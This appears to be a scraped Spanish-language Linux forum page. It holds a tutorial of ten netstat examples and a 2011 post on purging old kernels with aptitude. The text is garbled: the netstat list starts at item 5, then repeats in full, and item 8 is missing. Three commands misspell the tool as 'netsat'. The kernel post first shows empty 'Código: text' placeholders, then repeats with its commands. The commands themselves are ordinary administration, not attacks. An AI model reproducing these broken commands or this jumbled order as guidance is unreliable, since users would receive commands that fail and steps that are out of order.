5) No mostar el host, puerto y nombre del usuario en la salida del netstat
Cuando no quieres que se muestre el nombre del host, puerto y el usuario usa la opción netstat -n. Esto mostrara en números , en vez de el nombre del host, puerto y el usuario.
Esto también aumenta la velocidad de la salida ya que netstat no realiza ningún look-up
# netstat -an
Si no deseas que se muestren solo alguno de estos tres (puerto, host o usuario) usa lo siguiente:
# netsat -a --numeric-ports
# netsat -a --numeric-hosts
# netsat -a --numeric-users
6) Imprimir la información de netstat continuamente
netstat imprimirá la información continuamente cada ciertos segundos
# netstat -c
7) Encontrar las familias de direcciones no soportadas en tu sistema
netstat --verbose
Mostrar información de ruteo de kernel usando netstat -r
# netstat -r
Nota: Usa netstat -rn para mostrar en formato numerico sin resolver el nombre del host.
9) Buscar en que puerto se esta ejecutando un programa
# netstat -ap | grep nombre del programa
10) Mostrar la lista de las interfaces de red
# netstat -i
Mostrar mas detalles sobre la informacion de las interfaces de red (similar a ifconfig)
# netstat -ie
En este articulo se revisara 10 ejemplos practicos sobre el uso del comando netstat.
1) Listar todos los puertos (Abiertos y No abiertos)
Listar todos los puertos usando netstat -a
# netstat -a | more
Listar todos los puertos TCP usando netstat -at
# netstat -at
Listar todos los puertos UDP usando netstat -au
# netstat -au
2) Listar todos los sockets que esten estado Listening
Listar solo los puertos en Listening usando netstat -l
# netstat -l
Listar solo los puertos TCP que esten en Listening usando netstat -lt
# netstat -lt
Listar solo los puertos UDP que esten en Listening usando netstat -lu
# netstat -lu
Listar solo los puertos UNIX que esten en Listening usando netstat -lx
# netstat -lx
3) Mostrar las estadisticas de cada protocolo
Mostrar las estadísticas de cada puerto usando netstat -s
# netstat -s
Mostrar estadísticas para puertos TCP o UP usando netstat -st o netstat -su
# netstat -st
# netstat -su
4) Mostrar PID y nombre de programa en la salida de netstat usando netstat -p
La opción netstat -p puede ser combinada con cualquier otra opción. Esto agregara el "PID/Nombre Programa" a la salida del netstat. Esto es muy útil cuando se esta depurando para identificar que programa esta ejecutándose en un puerto en particular.
# netstat -pt
5) No mostar el host, puerto y nombre del usuario en la salida del netstat
Cuando no quieres que se muestre el nombre del host, puerto y el usuario usa la opción netstat -n. Esto mostrara en números , en vez de el nombre del host, puerto y el usuario.
Esto también aumenta la velocidad de la salida ya que netstat no realiza ningún look-up
# netstat -an
Si no deseas que se muestren solo alguno de estos tres (puerto, host o usuario) usa lo siguiente:
# netsat -a --numeric-ports
# netsat -a --numeric-hosts
# netsat -a --numeric-users
6) Imprimir la información de netstat continuamente
netstat imprimirá la información continuamente cada ciertos segundos
# netstat -c
7) Encontrar las familias de direcciones no soportadas en tu sistema
netstat --verbose
Mostrar información de ruteo de kernel usando netstat -r
# netstat -r
Nota: Usa netstat -rn para mostrar en formato numerico sin resolver el nombre del host.
9) Buscar en que puerto se esta ejecutando un programa
# netstat -ap | grep nombre del programa
10) Mostrar la lista de las interfaces de red
# netstat -i
Mostrar mas detalles sobre la informacion de las interfaces de red (similar a ifconfig)
# netstat -ie
#200
GNU/Linux / Como eliminar kernels desfasados
Junio 13, 2011, 02:41:09 PM
Sucede que a medida de que nuestro sistema se actualizando, nuevos núcleos del sistema Linux se van instalando. Los anteriores permanecen en el sistema por si necesitáramos usarlos. Esto se ve claramente al arrancar la máquina en la pantalla de selección de sistemas operativos del grub.
Además de la sobrecarga del menú del grub por núcleos de Linux que ya no vamos a usar, estos ocupan una cantidad no despreciable en nuestro disco duro.
Eliminarlos es bastante fácil haciendo uso de un terminal. Abrimos uno pulsando simultáneamente CTRL+ATL+T o desde Aplicaciones - Accesorios - Terminal.
Si nuestro sistema no tiene aptitude instalado lo instalamos mediante
Código: text
Una vez instalado aptitude nos vamos a servir de él para conocer los núcleos instalados mediante el siguiente comando:
Código: text
Se mostrará un listado con los kernels instalados. De estos uno es el que estamos usando y no debemos borrarlo. Seguramente será el más reciente, indicado por su número de versión. El más reciente es el que tiene número de versión superior. Para asegurarnos podemos usar el comando siguiente que nos indica el kernel en uso.
Código: text
Una vez sabemos cual NO debemos borrar podemos empezar a borrar los más viejos. El comando para hacerlo será:
Código: text
Donde cambiaremos nombre_del_kernel por el correspondiente al núcleo que queremos borrar. Tras unos segundos el kernel quedará borrado.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Además de la sobrecarga del menú del grub por núcleos de Linux que ya no vamos a usar, estos ocupan una cantidad no despreciable en nuestro disco duro.
Eliminarlos es bastante fácil haciendo uso de un terminal. Abrimos uno pulsando simultáneamente CTRL+ATL+T o desde Aplicaciones - Accesorios - Terminal.
Si nuestro sistema no tiene aptitude instalado lo instalamos mediante
sudo apt-get install aptitude
Una vez instalado aptitude nos vamos a servir de él para conocer los núcleos instalados mediante el siguiente comando:
aptitude search ~ilinux-image-2
Se mostrará un listado con los kernels instalados. De estos uno es el que estamos usando y no debemos borrarlo. Seguramente será el más reciente, indicado por su número de versión. El más reciente es el que tiene número de versión superior. Para asegurarnos podemos usar el comando siguiente que nos indica el kernel en uso.
uname -r
Una vez sabemos cual NO debemos borrar podemos empezar a borrar los más viejos. El comando para hacerlo será:
sudo aptitude purge nombre_del_kernel
Donde cambiaremos nombre_del_kernel por el correspondiente al núcleo que queremos borrar. Tras unos segundos el kernel quedará borrado.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta